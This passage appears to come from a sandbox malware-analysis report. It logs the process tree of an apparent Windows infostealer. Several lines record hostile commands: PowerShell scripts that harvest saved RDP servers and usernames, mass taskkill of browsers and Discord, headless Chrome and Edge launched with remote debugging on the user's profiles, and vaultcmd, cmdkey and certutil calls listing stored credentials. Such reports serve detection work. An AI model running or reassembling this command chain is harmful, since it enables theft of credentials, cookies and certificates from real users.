                                  "powershell" -Command " $regPath = \"HKCU:\Software\Microsoft\Terminal Server Client\Servers\" if (Test-Path $regPath) { Get-ChildItem $regPath | ForEach-Object { $server = $_.PSChildName $usernamePath = Join-Path $_.PSPath \"UsernameHint\" $username = if (Test-Path $usernamePath) { (Get-ItemProperty -Path $usernamePath -Name \"(default)\" -ErrorAction SilentlyContinue).\"(default)\" } else { \"\" } Write-Output \"Server:$server,Username:$username\" } } "
                                  7⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Hide Artifacts: Ignore Process Interrupts
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3544
                                • C:\Windows\system32\tasklist.exe
                                  "tasklist"
                                  7⤵
                                  • Enumerates processes with tasklist
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1096
                                • C:\Windows\system32\tasklist.exe
                                  "tasklist"
                                  7⤵
                                  • Enumerates processes with tasklist
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4716
                                • C:\Windows\system32\cmdkey.exe
                                  "cmdkey" /list
                                  7⤵
                                    PID:4720
                                  • C:\Windows\system32\cmdkey.exe
                                    "cmdkey" /list:TERMSRV/69.48.201.74
                                    7⤵
                                      PID:2844
                                    • C:\Windows\system32\taskkill.exe
                                      "taskkill" /IM chrome.exe
                                      7⤵
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:872
                                    • C:\Windows\system32\taskkill.exe
                                      "taskkill" /IM msedge.exe
                                      7⤵
                                      • Kills process with taskkill
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4852
                                    • C:\Windows\system32\taskkill.exe
                                      "taskkill" /IM brave.exe
                                      7⤵
                                      • Kills process with taskkill
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:5700
                                    • C:\Windows\system32\taskkill.exe
                                      "taskkill" /IM opera.exe
                                      7⤵
                                      • Kills process with taskkill
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2308
                                    • C:\Windows\system32\taskkill.exe
                                      "taskkill" /F /IM chrome.exe
                                      7⤵
                                      • Kills process with taskkill
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4536
                                    • C:\Windows\system32\taskkill.exe
                                      "taskkill" /IM vivaldi.exe
                                      7⤵
                                      • Kills process with taskkill
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:5716
                                    • C:\Windows\system32\taskkill.exe
                                      "taskkill" /F /IM Discord.exe
                                      7⤵
                                      • Kills process with taskkill
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:3284
                                    • C:\Windows\system32\taskkill.exe
                                      "taskkill" /IM firefox.exe
                                      7⤵
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4460
                                    • C:\Windows\system32\taskkill.exe
                                      "taskkill" /F /IM DiscordCanary.exe
                                      7⤵
                                      • Kills process with taskkill
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:3516
                                    • C:\Windows\system32\taskkill.exe
                                      "taskkill" /IM dragon.exe
                                      7⤵
                                      • Kills process with taskkill
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:5316
                                    • C:\Windows\system32\taskkill.exe
                                      "taskkill" /F /IM DiscordPTB.exe
                                      7⤵
                                      • Kills process with taskkill
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1968
                                    • C:\Windows\system32\taskkill.exe
                                      "taskkill" /IM maxthon.exe
                                      7⤵
                                      • Kills process with taskkill
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2824
                                    • C:\Windows\system32\taskkill.exe
                                      "taskkill" /F /IM DiscordDevelopment.exe
                                      7⤵
                                      • Kills process with taskkill
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4744
                                    • C:\Windows\system32\taskkill.exe
                                      "taskkill" /IM uc_browser.exe
                                      7⤵
                                      • Kills process with taskkill
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:5556
                                    • C:\Windows\system32\taskkill.exe
                                      "taskkill" /IM slimjet.exe
                                      7⤵
                                      • Kills process with taskkill
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:6020
                                    • C:\Windows\system32\taskkill.exe
                                      "taskkill" /IM cent_browser.exe
                                      7⤵
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1832
                                    • C:\Windows\system32\taskkill.exe
                                      "taskkill" /IM epic.exe
                                      7⤵
                                      • Kills process with taskkill
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:6088
                                    • C:\Windows\system32\taskkill.exe
                                      "taskkill" /IM torch.exe
                                      7⤵
                                      • Kills process with taskkill
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2692
                                    • C:\Windows\system32\taskkill.exe
                                      "taskkill" /IM whale.exe
                                      7⤵
                                      • Kills process with taskkill
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:6112
                                    • C:\Windows\system32\taskkill.exe
                                      "taskkill" /IM 360browser.exe
                                      7⤵
                                      • Kills process with taskkill
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:5308
                                    • C:\Windows\system32\taskkill.exe
                                      "taskkill" /IM qqbrowser.exe
                                      7⤵
                                      • Kills process with taskkill
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:5356
                                      • C:\Windows\System32\Conhost.exe
                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        8⤵
                                          PID:5700
                                      • C:\Windows\system32\taskkill.exe
                                        "taskkill" /IM browser.exe
                                        7⤵
                                        • Kills process with taskkill
                                        PID:4080
                                      • C:\Windows\system32\taskkill.exe
                                        "taskkill" /F /IM chrome.exe
                                        7⤵
                                        • Kills process with taskkill
                                        PID:3868
                                      • C:\Windows\system32\taskkill.exe
                                        "taskkill" /F /IM msedge.exe
                                        7⤵
                                        • Kills process with taskkill
                                        PID:5300
                                      • C:\Windows\system32\taskkill.exe
                                        "taskkill" /F /IM brave.exe
                                        7⤵
                                        • Kills process with taskkill
                                        PID:1184
                                      • C:\Windows\system32\taskkill.exe
                                        "taskkill" /F /IM opera.exe
                                        7⤵
                                        • Kills process with taskkill
                                        PID:3136
                                      • C:\Windows\system32\taskkill.exe
                                        "taskkill" /F /IM vivaldi.exe
                                        7⤵
                                        • Kills process with taskkill
                                        PID:4708
                                      • C:\Windows\system32\taskkill.exe
                                        "taskkill" /F /IM firefox.exe
                                        7⤵
                                        • Kills process with taskkill
                                        PID:5028
                                      • C:\Windows\system32\taskkill.exe
                                        "taskkill" /F /IM dragon.exe
                                        7⤵
                                          PID:4616
                                        • C:\Windows\system32\taskkill.exe
                                          "taskkill" /F /IM maxthon.exe
                                          7⤵
                                          • Kills process with taskkill
                                          PID:1324
                                        • C:\Windows\system32\taskkill.exe
                                          "taskkill" /F /IM uc_browser.exe
                                          7⤵
                                          • Kills process with taskkill
                                          PID:4936
                                        • C:\Windows\system32\taskkill.exe
                                          "taskkill" /F /IM slimjet.exe
                                          7⤵
                                          • Kills process with taskkill
                                          PID:1796
                                        • C:\Windows\system32\taskkill.exe
                                          "taskkill" /F /IM cent_browser.exe
                                          7⤵
                                            PID:5528
                                          • C:\Windows\system32\taskkill.exe
                                            "taskkill" /F /IM epic.exe
                                            7⤵
                                            • Kills process with taskkill
                                            PID:5632
                                          • C:\Windows\system32\taskkill.exe
                                            "taskkill" /F /IM torch.exe
                                            7⤵
                                              PID:5680
                                            • C:\Windows\system32\taskkill.exe
                                              "taskkill" /F /IM whale.exe
                                              7⤵
                                              • Kills process with taskkill
                                              PID:1936
                                            • C:\Windows\system32\taskkill.exe
                                              "taskkill" /F /IM 360browser.exe
                                              7⤵
                                                PID:6132
                                              • C:\Windows\system32\taskkill.exe
                                                "taskkill" /F /IM qqbrowser.exe
                                                7⤵
                                                • Kills process with taskkill
                                                PID:5052
                                              • C:\Windows\system32\taskkill.exe
                                                "taskkill" /F /IM browser.exe
                                                7⤵
                                                • Kills process with taskkill
                                                PID:3584
                                                • C:\Windows\System32\Conhost.exe
                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  8⤵
                                                    PID:1900
                                                • C:\Windows\system32\tasklist.exe
                                                  "tasklist" /FI "IMAGENAME eq chrome.exe"
                                                  7⤵
                                                  • Enumerates processes with tasklist
                                                  PID:3544
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless=new --disable-extensions --disable-gpu --no-sandbox --disable-software-rasterizer --disable-dev-shm-usage --disable-background-networking --disable-default-apps --disable-translate --disable-sync --metrics-recording-only --mute-audio --no-first-run --no-default-browser-check --remote-debugging-port=45099 --remote-allow-origins=* "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory=Default
                                                  7⤵
                                                  • Uses browser remote debugging
                                                  • Checks processor information in registry
                                                  • Enumerates system info in registry
                                                  • Modifies data under HKEY_USERS
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of FindShellTrayWindow
                                                  PID:824
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff99adedcf8,0x7ff99adedd04,0x7ff99adedd10
                                                    8⤵
                                                      PID:5392
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --headless=new --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --gpu-preferences=UAAAAAAAAADgAQAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=disabled --field-trial-handle=2060,i,5058231268183930068,15517443904627184140,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2052 /prefetch:2
                                                      8⤵
                                                      • Modifies registry class
                                                      PID:5360
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2620,i,5058231268183930068,15517443904627184140,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2584 /prefetch:3
                                                      8⤵
                                                        PID:5932
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2708,i,5058231268183930068,15517443904627184140,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2576 /prefetch:8
                                                        8⤵
                                                          PID:6044
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=45099 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2948,i,5058231268183930068,15517443904627184140,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2936 /prefetch:1
                                                          8⤵
                                                          • Uses browser remote debugging
                                                          PID:5284
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=45099 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=2972,i,5058231268183930068,15517443904627184140,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2960 /prefetch:1
                                                          8⤵
                                                          • Uses browser remote debugging
                                                          PID:5036
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=45099 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3988,i,5058231268183930068,15517443904627184140,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3984 /prefetch:1
                                                          8⤵
                                                          • Uses browser remote debugging
                                                          PID:4764
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=4492,i,5058231268183930068,15517443904627184140,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4032 /prefetch:8
                                                          8⤵
                                                            PID:1008
                                                        • C:\Windows\system32\tasklist.exe
                                                          "tasklist" /FI "IMAGENAME eq chrome.exe"
                                                          7⤵
                                                          • Enumerates processes with tasklist
                                                          PID:1132
                                                        • C:\Windows\system32\taskkill.exe
                                                          "taskkill" /F /IM chrome.exe
                                                          7⤵
                                                          • Kills process with taskkill
                                                          PID:2068
                                                          • C:\Windows\System32\Conhost.exe
                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            8⤵
                                                              PID:5632
                                                          • C:\Windows\system32\tasklist.exe
                                                            "tasklist" /FI "IMAGENAME eq msedge.exe"
                                                            7⤵
                                                            • Enumerates processes with tasklist
                                                            PID:1916
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --headless=new --disable-extensions --disable-gpu --no-sandbox --disable-software-rasterizer --disable-dev-shm-usage --disable-background-networking --disable-default-apps --disable-translate --disable-sync --metrics-recording-only --mute-audio --no-first-run --no-default-browser-check --remote-debugging-port=44924 --remote-allow-origins=* "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --profile-directory=Default
                                                            7⤵
                                                            • Uses browser remote debugging
                                                            • Checks processor information in registry
                                                            • Enumerates system info in registry
                                                            • Modifies data under HKEY_USERS
                                                            • Modifies registry class
                                                            • Suspicious use of FindShellTrayWindow
                                                            PID:4636
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x228,0x22c,0x230,0x224,0x354,0x7ff99adcf208,0x7ff99adcf214,0x7ff99adcf220
                                                              8⤵
                                                                PID:5176
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-sandbox --headless=new --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --gpu-preferences=UAAAAAAAAADgAQAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=disabled --always-read-main-dll --field-trial-handle=2380,i,6926771358423365264,542774121128721449,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2360 /prefetch:2
                                                                8⤵
                                                                • Modifies registry class
                                                                PID:1968
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=3168,i,6926771358423365264,542774121128721449,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3160 /prefetch:3
                                                                8⤵
                                                                  PID:5740
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=3480,i,6926771358423365264,542774121128721449,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3256 /prefetch:8
                                                                  8⤵
                                                                    PID:4440
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --pdf-upsell-enabled --no-sandbox --remote-debugging-port=44924 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=4036,i,6926771358423365264,542774121128721449,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4032 /prefetch:1
                                                                    8⤵
                                                                    • Uses browser remote debugging
                                                                    PID:1584
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --instant-process --pdf-upsell-enabled --no-sandbox --remote-debugging-port=44924 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=4184,i,6926771358423365264,542774121128721449,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4180 /prefetch:1
                                                                    8⤵
                                                                    • Uses browser remote debugging
                                                                    PID:5424
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=4832,i,6926771358423365264,542774121128721449,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4820 /prefetch:8
                                                                    8⤵
                                                                      PID:2308
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --no-sandbox --mute-audio --onnx-enabled-for-ee --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=4936,i,6926771358423365264,542774121128721449,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4940 /prefetch:8
                                                                      8⤵
                                                                        PID:6044
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=5384,i,6926771358423365264,542774121128721449,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5380 /prefetch:8
                                                                        8⤵
                                                                          PID:1916
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=5384,i,6926771358423365264,542774121128721449,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5380 /prefetch:8
                                                                          8⤵
                                                                            PID:5692
                                                                        • C:\Windows\system32\tasklist.exe
                                                                          "tasklist" /FI "IMAGENAME eq msedge.exe"
                                                                          7⤵
                                                                          • Enumerates processes with tasklist
                                                                          PID:4448
                                                                        • C:\Windows\system32\taskkill.exe
                                                                          "taskkill" /F /IM msedge.exe
                                                                          7⤵
                                                                          • Kills process with taskkill
                                                                          PID:2920
                                                                        • C:\Windows\system32\taskkill.exe
                                                                          "taskkill" /IM chrome.exe
                                                                          7⤵
                                                                          • Kills process with taskkill
                                                                          PID:1376
                                                                        • C:\Windows\system32\taskkill.exe
                                                                          "taskkill" /IM msedge.exe
                                                                          7⤵
                                                                          • Kills process with taskkill
                                                                          PID:816
                                                                        • C:\Windows\system32\taskkill.exe
                                                                          "taskkill" /IM brave.exe
                                                                          7⤵
                                                                          • Kills process with taskkill
                                                                          PID:4456
                                                                        • C:\Windows\system32\taskkill.exe
                                                                          "taskkill" /IM opera.exe
                                                                          7⤵
                                                                          • Kills process with taskkill
                                                                          PID:3368
                                                                        • C:\Windows\system32\taskkill.exe
                                                                          "taskkill" /IM vivaldi.exe
                                                                          7⤵
                                                                          • Kills process with taskkill
                                                                          PID:4904
                                                                        • C:\Windows\system32\taskkill.exe
                                                                          "taskkill" /IM firefox.exe
                                                                          7⤵
                                                                            PID:1520
                                                                          • C:\Windows\system32\taskkill.exe
                                                                            "taskkill" /IM dragon.exe
                                                                            7⤵
                                                                            • Kills process with taskkill
                                                                            PID:5880
                                                                          • C:\Windows\system32\taskkill.exe
                                                                            "taskkill" /IM maxthon.exe
                                                                            7⤵
                                                                            • Kills process with taskkill
                                                                            PID:2896
                                                                          • C:\Windows\system32\taskkill.exe
                                                                            "taskkill" /IM uc_browser.exe
                                                                            7⤵
                                                                            • Kills process with taskkill
                                                                            PID:5656
                                                                          • C:\Windows\system32\taskkill.exe
                                                                            "taskkill" /IM slimjet.exe
                                                                            7⤵
                                                                              PID:2444
                                                                            • C:\Windows\system32\taskkill.exe
                                                                              "taskkill" /IM cent_browser.exe
                                                                              7⤵
                                                                                PID:3672
                                                                              • C:\Windows\system32\taskkill.exe
                                                                                "taskkill" /IM epic.exe
                                                                                7⤵
                                                                                • Kills process with taskkill
                                                                                PID:5500
                                                                              • C:\Windows\system32\taskkill.exe
                                                                                "taskkill" /IM torch.exe
                                                                                7⤵
                                                                                • Kills process with taskkill
                                                                                PID:6024
                                                                              • C:\Windows\system32\taskkill.exe
                                                                                "taskkill" /IM whale.exe
                                                                                7⤵
                                                                                • Kills process with taskkill
                                                                                PID:2588
                                                                              • C:\Windows\system32\taskkill.exe
                                                                                "taskkill" /IM 360browser.exe
                                                                                7⤵
                                                                                • Kills process with taskkill
                                                                                PID:208
                                                                              • C:\Windows\system32\taskkill.exe
                                                                                "taskkill" /IM qqbrowser.exe
                                                                                7⤵
                                                                                • Kills process with taskkill
                                                                                PID:5796
                                                                              • C:\Windows\system32\taskkill.exe
                                                                                "taskkill" /IM browser.exe
                                                                                7⤵
                                                                                • Kills process with taskkill
                                                                                PID:3292
                                                                              • C:\Windows\system32\taskkill.exe
                                                                                "taskkill" /F /IM chrome.exe
                                                                                7⤵
                                                                                • Kills process with taskkill
                                                                                PID:2500
                                                                              • C:\Windows\system32\taskkill.exe
                                                                                "taskkill" /F /IM msedge.exe
                                                                                7⤵
                                                                                • Kills process with taskkill
                                                                                PID:640
                                                                              • C:\Windows\system32\taskkill.exe
                                                                                "taskkill" /F /IM brave.exe
                                                                                7⤵
                                                                                • Kills process with taskkill
                                                                                PID:3052
                                                                              • C:\Windows\system32\taskkill.exe
                                                                                "taskkill" /F /IM opera.exe
                                                                                7⤵
                                                                                  PID:5292
                                                                                • C:\Windows\system32\taskkill.exe
                                                                                  "taskkill" /F /IM vivaldi.exe
                                                                                  7⤵
                                                                                  • Kills process with taskkill
                                                                                  PID:2940
                                                                                • C:\Windows\system32\taskkill.exe
                                                                                  "taskkill" /F /IM firefox.exe
                                                                                  7⤵
                                                                                  • Kills process with taskkill
                                                                                  PID:6120
                                                                                • C:\Windows\system32\taskkill.exe
                                                                                  "taskkill" /F /IM dragon.exe
                                                                                  7⤵
                                                                                    PID:5168
                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                    "taskkill" /F /IM maxthon.exe
                                                                                    7⤵
                                                                                    • Kills process with taskkill
                                                                                    PID:3756
                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                    "taskkill" /F /IM uc_browser.exe
                                                                                    7⤵
                                                                                    • Kills process with taskkill
                                                                                    PID:4608
                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                    "taskkill" /F /IM slimjet.exe
                                                                                    7⤵
                                                                                    • Kills process with taskkill
                                                                                    PID:5092
                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                    "taskkill" /F /IM cent_browser.exe
                                                                                    7⤵
                                                                                    • Kills process with taskkill
                                                                                    PID:3160
                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                    "taskkill" /F /IM epic.exe
                                                                                    7⤵
                                                                                    • Kills process with taskkill
                                                                                    PID:4856
                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                    "taskkill" /F /IM torch.exe
                                                                                    7⤵
                                                                                    • Kills process with taskkill
                                                                                    PID:2308
                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                    "taskkill" /F /IM whale.exe
                                                                                    7⤵
                                                                                    • Kills process with taskkill
                                                                                    PID:1664
                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                    "taskkill" /F /IM 360browser.exe
                                                                                    7⤵
                                                                                    • Kills process with taskkill
                                                                                    PID:3688
                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                    "taskkill" /F /IM qqbrowser.exe
                                                                                    7⤵
                                                                                    • Kills process with taskkill
                                                                                    PID:5020
                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                    "taskkill" /F /IM browser.exe
                                                                                    7⤵
                                                                                      PID:1908
                                                                                    • C:\Windows\system32\vaultcmd.exe
                                                                                      "vaultcmd" /list
                                                                                      7⤵
                                                                                        PID:5896
                                                                                      • C:\Windows\system32\cmdkey.exe
                                                                                        "cmdkey" /list
                                                                                        7⤵
                                                                                          PID:1020
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          "powershell" -Command " $entries = cmdkey /list | Select-String \"TERMSRV\" -Context 0,3 foreach ($entry in $entries) { $target = ($entry -split \"target=\")[1].Trim() $ip = $target -replace \"TERMSRV/\", \"\" $userLine = $entry.Context.PostContext | Select-String \"User\" $user = if ($userLine) { ($userLine -split \":\")[1].Trim() } else { \"N/A\" } Write-Output \"Server: $ip | Username: $user\" } "
                                                                                          7⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          PID:4912
                                                                                          • C:\Windows\system32\cmdkey.exe
                                                                                            "C:\Windows\system32\cmdkey.exe" /list
                                                                                            8⤵
                                                                                              PID:4156
                                                                                          • C:\Windows\system32\certutil.exe
                                                                                            "certutil" -store My
                                                                                            7⤵
                                                                                              PID:1128
                                                                                            • C:\Windows\system32\certutil.exe
                                                                                              "certutil" -store -user My
                                                                                              7⤵
